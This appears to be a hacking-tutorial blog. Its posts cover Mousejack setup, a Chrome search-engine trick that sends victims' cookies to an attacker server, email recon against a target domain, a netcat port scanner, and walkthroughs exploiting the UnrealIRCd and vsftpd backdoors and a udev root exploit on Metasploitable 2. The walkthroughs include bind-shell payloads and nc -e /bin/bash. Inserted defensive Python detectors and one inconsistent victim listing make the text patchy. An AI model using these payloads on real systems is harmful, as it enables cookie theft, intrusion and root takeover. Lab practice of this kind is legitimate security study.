metalkey

Hacking tutorials + info

Mousejack on the WiFi Pineapple

June 15, 2018

The Mousejack attack is extremely useful for dropping payloads on machines that use vulnerable RF wireless devices. After a bit of trial and error, it was possible to get the Jackit exploit tool running on a WiFi Pineapple.
The commands to get things up and running are below.

Note: It is also possible to run Jackit on the Nano but it requires moving Python to an external SD card first.

root@pineapple:~$ opkg update
root@pineapple:~$ opkg install python-pip libusb-1.0 libusb-compat
root@pineapple:~$ pip install pyusb click six tabulate
...
Download jackit from https://github.com/Sliim/jackit/tree/openwrt-libusb
Modify jackit as per the master...Sliim:openwrt-libusb diff (e.g. wget https://raw.githubusercontent.com/Sliim/jackit/4de42c5d9cdae2ed1009b8cd161101e88ab1c76a/jackit/lib/nrf24.py)
...
root@pineapple:~$ ./setup.py build
root@pineapple:~$ ./setup.py install

Jackit Github Page:
https://github.com/insecurityofthings/jackit

Tags: wifi

Google Chrome Search Poison – Default Search Engine Exploit

August 27, 2017

Introduction

In December 2015, I discovered a vulnerability in Google Chrome's default search engines feature that allows malicious JavaScript to execute whenever the victim performs a search from the omnibox (i.e. the URL textbox).
The malicious JavaScript can be set to perform various functions, including cookie stealing, search keyword interception, browser fingerprinting, etc.
In this walkthrough we'll set up a Python SimpleHTTPServer and intercept the victim's cookies and search keywords.

Note: The vulnerability was reported to the Google/Chromium team but was considered a feature rather than a vulnerability.

Video Demo

The video demonstration involves manipulating the Chrome master-preferences file to infect the user with the malicious search engine. The user is then directed to the attacker's Apache server, which extracts the search query, cookies and other system information and seamlessly redirects them back to their search.

Walkthrough - Setting up the Listener in Kali

root@kali:~$ python -m SimpleHTTPServer 80

Setup on Victim Machine

  1. Go into "Settings" in Google Chrome
  2. Click on "Manage Search Engines"
  3. Enter your malicious JS and click "Make Default"

Example

javascript:window.location='http://192.168.1.182/%s'+escape(document.cookie);

Note: 192.168.1.182 is our SimpleHTTPServer.
Now, whenever the victim searches using Google Chrome's omnibox, the malicious JS will trigger, forwarding you their cookie and the search string (%s).

Other examples

javascript:window.location='http://192.168.1.182/%s'+escape(document.cookie);
javascript:window.location='http://192.168.1.182/%s'+escape(document.baseURI);
javascript:window.location='http://192.168.1.182/%s'+escape(document.domain);
javascript:window.location='http://192.168.1.182/%s'+escape(document.URL);
javascript:window.location='http://192.168.1.182/%s'+escape(location.host);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.appCodeName);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.appName);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.appVersion);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.platform);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.userAgent);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.product);

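As an added example (not part of the original post), here is a Python check a defender can run against a copy of a Chrome profile's "Web Data" SQLite file to find search providers whose URL would run script instead of fetching a results page. It assumes that file's keywords table has short_name, keyword and url columns, and it builds a constructed sample database rather than reading a real profile.

```python
import os
import re
import sqlite3
import tempfile
from urllib.parse import urlsplit

SCRIPT_SCHEMES = {"javascript", "data", "vbscript"}  # run code, fetch nothing

def search_url_scheme(url):
    """Scheme of a provider URL after stripping the leading whitespace/control
    characters browsers ignore (a common way to disguise 'javascript:')."""
    cleaned = re.sub(r"^[\s\x00-\x1f]+", "", url)
    return urlsplit(cleaned).scheme.lower()

def is_poisoned(url):
    return search_url_scheme(url) in SCRIPT_SCHEMES

def audit_keywords(db_path):
    """Rows (short_name, keyword, url) of the 'keywords' table in a Chrome
    'Web Data' SQLite file whose search URL would execute script."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute("SELECT short_name, keyword, url FROM keywords").fetchall()
    finally:
        con.close()
    return [row for row in rows if is_poisoned(row[2])]

def build_sample_db(path):
    """Constructed sample (not a real profile): one normal provider plus one
    set to the javascript: URL from the post above."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE keywords (short_name TEXT, keyword TEXT, url TEXT)")
    con.executemany("INSERT INTO keywords VALUES (?, ?, ?)", [
        ("Google", "google.com", "https://www.google.com/search?q={searchTerms}"),
        ("Google", "g.com",
         "javascript:window.location='http://192.168.1.182/%s'+escape(document.cookie);"),
    ])
    con.commit()
    con.close()

def demo():
    """Build the sample database in a temp file, audit it, and return the hits."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    try:
        build_sample_db(path)
        return audit_keywords(path)
    finally:
        os.remove(path)
```

Against a real machine, point audit_keywords at a copy of the profile's "Web Data" file, since Chrome keeps the original locked while it is running.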
Tags: search-poison

Company Email Enumeration + Breached Email Finder

October 24, 2016 — metalkey
Enumerating email addresses for a target domain and checking if these emails appear in known breaches can be extremely useful when performing recon.
This script will use hunter.io to enumerate domain emails and feed them into hacked-emails.com to check if they appear in known breaches.

Note: Substitute YOURAPIKEY with your hunter.io API key. This can be obtained by creating a hunter.io account.

root@kali:~# cat emails.sh
#!/bin/bash
# Remove results from a previous run (-f so a missing file is not an error)
rm -f found-emails.txt hacked-emails.txt
clear
echo -e "\e[92mEnter Target Domain:"
echo -e "\e[39m"
read -r hname
clear
echo -e "[+] Email Recon Started"
echo -e "\e[39m"

# Email Checks: hunter.io returns JSON, so pull every "value" field (the addresses)
echo "- Enumerating Domain Emails"
curl -k -s "https://api.emailhunter.co/v1/search?domain=$hname&api_key=YOURAPIKEY" | grep -Po '"value" :.*?[^\\]",' | cut -d'"' -f4 > found-emails.txt
echo "Found the following emails:"
cat found-emails.txt
echo ""
echo "[+] Checking if Emails have been breached"
# One lookup per address, run in the background; wait blocks until all have finished
while read -r email; do
curl -k -s "https://hacked-emails.com/api?q=$email" | grep '"status":"found"' | cut -d'"' -f8 >> hacked-emails.txt &
done < found-emails.txt
wait
echo "The following email addresses appear in known breaches:"
cat hacked-emails.txt

echo -e "\e[39m"
echo -e "[END] Email Recon Complete!"
echo -e ""

Tags: recon

Installing Wickr on Ubuntu 16.04

October 22, 2016 — metalkey

Download Wickr and Dependencies

user@ubuntu~$ wget https://dls.wickr.com/Downloads/wickr-me_2.6.0_amd64.deb
user@ubuntu~$ wget http://security.ubuntu.com/ubuntu/pool/universe/liba/libav/libavutil52_9.18-0ubuntu0.14.04.1_amd64.deb
user@ubuntu~$ wget http://mirrors.kernel.org/ubuntu/pool/main/i/icu/libicu52_52.1-8ubuntu0.2_amd64.deb
user@ubuntu~$ wget http://mirrors.kernel.org/ubuntu/pool/universe/x/x264/libx264-142_0.142.2389+git956c8d8-2_amd64.deb

Install Dependencies and Wickr

user@ubuntu~$ sudo dpkg -i libavutil52_9.18-0ubuntu0.14.04.1_amd64.deb
user@ubuntu~$ sudo dpkg -i libicu52_52.1-8ubuntu0.2_amd64.deb
user@ubuntu~$ sudo dpkg -i libx264-142_0.142.2389+git956c8d8-2_amd64.deb
user@ubuntu~$ sudo dpkg -i wickr-me_2.6.0_amd64.deb
user@ubuntu~$ wickr-me

Tags: privacy

Port Scanning With Netcat (Up to 1000 ports/second)

October 08, 2016 — metalkey

nano catscan.sh
#!/bin/bash
# Reads hostnames from targets.txt (one per line); all output goes to catscan-results/
mkdir -p catscan-results
cp targets.txt catscan-results
cd catscan-results || exit 1

# Use ping to get IP addresses. Strip bash colours from output with sed
echo "Generating IP list..."
for host in $(cat targets.txt);do
hostip=$(ping -c 1 -W 1 "$host" | grep PING | cut -d"(" -f2 | cut -d")" -f1 | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g")
# Skip names that did not resolve, otherwise an empty line ends up in the host list
if [ -z "$hostip" ]; then
echo "$host did not resolve"
continue
fi
echo "$host resolves to $hostip"
echo "$host resolves to $hostip" >> host-ip.txt
echo "$hostip" >> temp-hosts.txt
done

# Sort ips and remove dupes
sort -u temp-hosts.txt > hosts.txt
rm temp-hosts.txt

echo "Starting scan..."
# Scan y ports at a time and output to results.txt
# To change number of ports scanned at a time, change y, x incrementer, y incrementer
for ip in $(cat hosts.txt);do
x=0
y=1000
while [ $x -le 65535 ];do
[ $y -gt 65535 ] && y=65535   # 65535 is the highest valid port
echo "Scanning $ip (Ports $x - $y)"
for num in $(seq $x $y);do
netcat -vzn -w 1 "$ip" "$num" >> results.txt 2>&1 &
done
wait
x=$(( y + 1 ))
y=$(( x + 999 ))
# Show open ports found so far for this host (the second grep filters the pipe, not the file)
grep "$ip" results.txt | grep " open" | sort -u
done
done
# Collect the open ports for every host
grep " open" results.txt | sort -u > open-ports.txt

Tags: port-scanning

UnrealIRCD 3.2.8.1 Backdoor Command Execution

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Metasploitable 2

Unreal IRCD 3.2.8.1 contains a backdoor that is triggered by entering AB; upon connecting. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

The following example demonstrates its use on Metasploitable 2 (192.168.1.142).

Generating the Payload

We’re going to generate a unix bind shell with msfvenom (port 4444) and connect to this with Netcat.

root@kali:~$ msfvenom -p cmd/unix/bind_perl --payload-options
root@kali:~$ msfvenom -p cmd/unix/bind_perl LHOST=192.168.1.142
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 240 bytes
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'

Triggering the Exploit

root@kali:~$ nc -vn 192.168.1.142 6667
(UNKNOWN) [192.168.1.142] 6667 (ircd) open
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
:irc.Metasploitable.LAN 451 AB;perl :You have not registered

Connecting to the Netcat Bind Shell

root@kali:~$ nc -vn 192.168.1.142 4444
(UNKNOWN) [192.168.1.142] 4444 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/etc/unreal#

Tags: backdoors

VSFTPD v2.3.4 Backdoor Command Execution

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows 10

VSFTPD v2.3.4 contains a backdoor that is triggered by entering anystring:) as the username (no password required). After the backdoor is triggered, the target machine opens a shell on port 6200.

This example demonstrates its use on Metasploitable 2 (192.168.1.142).

Triggering the Backdoor

root@kali:~$ ftp 192.168.1.142
Connected to 192.168.1.142.
220 (vsFTPd 2.3.4)
Name (192.168.1.142:root):123456:)
331 Please specify the password.
Password: [Enter]
[CTRL+C]
421 Service not available, remote server has closed connection

Connecting to the Shell

root@kali:~$ nc -vn 192.168.1.142 6200
(UNKNOWN) [192.168.1.142] 6200 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/#

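As an added example (not from the original post), here is a small Python detector for the two trigger strings described in this post and the UnrealIRCd post above: an IRC line that starts with AB; and an FTP USER name that ends in :). The capture records and their port numbers are constructed sample data, and the (src_ip, dst_port, line) tuple format is an assumption rather than the output of any real capture library.

```python
import re

# Trigger strings the two posts describe: UnrealIRCd 3.2.8.1 executes whatever
# follows "AB;" at the start of a line, and vsftpd 2.3.4 opens its shell on
# port 6200 when the FTP USER argument ends in ":)".
IRC_TRIGGER = "AB;"
FTP_USER_RE = re.compile(r"^USER\s+(?P<name>.+?)\s*$", re.IGNORECASE)

def check_irc_line(line):
    """Alert text if a client->server IRC line starts with the AB; trigger."""
    if line.startswith(IRC_TRIGGER):
        return "unrealircd-3.2.8.1-backdoor: payload=%r" % line[len(IRC_TRIGGER):].strip()
    return None

def check_ftp_line(line):
    """Alert text if an FTP USER command carries the :) trigger."""
    m = FTP_USER_RE.match(line)
    if m and m.group("name").endswith(":)"):
        return "vsftpd-2.3.4-backdoor: username=%r" % m.group("name")
    return None

def scan_capture(records):
    """records: iterable of (src_ip, dst_port, line) for client->server text.
    Returns [(src_ip, dst_port, alert)] for every line matching a trigger."""
    alerts = []
    for src, dport, line in records:
        if dport == 6667:          # IRC, as used on the page
            alert = check_irc_line(line)
        elif dport == 21:          # FTP control channel
            alert = check_ftp_line(line)
        else:
            alert = None
        if alert:
            alerts.append((src, dport, alert))
    return alerts

# Constructed sample capture (not real traffic); addresses follow the posts above.
SAMPLE = [
    ("192.168.1.50", 6667, "NICK alice"),
    ("192.168.1.50", 6667, "USER alice 0 * :Alice"),
    ("192.168.1.182", 6667, "AB;perl -MIO -e '...'"),
    ("192.168.1.182", 21, "USER 123456:)"),
    ("192.168.1.60", 21, "USER anonymous"),
    ("192.168.1.60", 21, "PASS guest@example.org"),
]

def demo():
    return scan_capture(SAMPLE)
```

Both checks only see plaintext, so the same logic belongs in an IDS rule or a log parser at the point where the IRC and FTP control channels are visible unencrypted.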
Tags: backdoors

Linux Kernel 2.6 UDEV < 141 – Local Privilege Escalation Exploit Example

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Metasploitable 2

Note: This exploit leverages a vulnerability in NETLINK.
More information on NETLINK can be found on the Linux Foundation website (http://www.linuxfoundation.org/collaborate/workgroups/networking/generic_netlink_howto).

Download the Exploit from ExploitDB

Head over to the Exploit Database and download Jon Oberheide’s udev exploit for Linux Kernel 2.6 (https://www.exploit-db.com/exploits/8572/).

Telnet to Metasploitable 2, then Upload and Compile the Exploit

Telnet to Metasploitable 2, then start a netcat listener.
In Kali, we're going to tar the exploit and pipe the output to netcat.
In Metasploitable 2, we're going to receive and untar the exploit, then compile it with gcc.

root@kali:~$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.

Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password: msfadmin
Linux metasploitable 2.6.24-16-server #1 SMP i686

msfadmin@metasploitable:~$ nc -lvp 12345 | tar -xf -
listening on [any] 12345 ...

Open a new tab, tar the exploit and pipe the output to netcat

root@kali:~$ tar -cf - 8572.c | nc -vn 192.168.1.10 12345
(UNKNOWN) [192.168.1.10] 12345 (?) open

Back in the first tab we can see our Kali Machine connect.
Allow a few seconds for the file transfer to complete then CTRL+C to end the session.
Check the exploit has been received, then compile with gcc.

connect to [192.168.1.10] from kali [192.168.1.182] 48411
msfadmin@metasploitable:~$ ls -lah 8572.c
-rw-r--r-- 1 msfadmin msfadmin 2.9K 2015-11-05 04:14 8572.c
msfadmin@metasploitable:~$ gcc 8572.c -o 8572

Executing the Exploit

Now we just need to get the PID of the udevd netlink socket on Metasploitable 2, create our run script (which binds an instance of bash to a netcat listener) and execute the exploit.

msfadmin@metasploitable:~$ cat /proc/net/netlink
df552800 15 2738 00000001 0 0 00000000 2
msfadmin@metasploitable:~$ cd /tmp
msfadmin@metasploitable:/tmp$ nano run
#!/bin/bash
nc -lvvp 2345 -e /bin/bash
msfadmin@metasploitable:/tmp$ cd
msfadmin@metasploitable:~$ ./8572 2738

Open a new tab and connect to the bind shell

root@kali:~$ nc -vn 192.168.1.10 2345
(UNKNOWN) [192.168.1.10] 2345 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/# whoami
root

Tags: privilege-escalation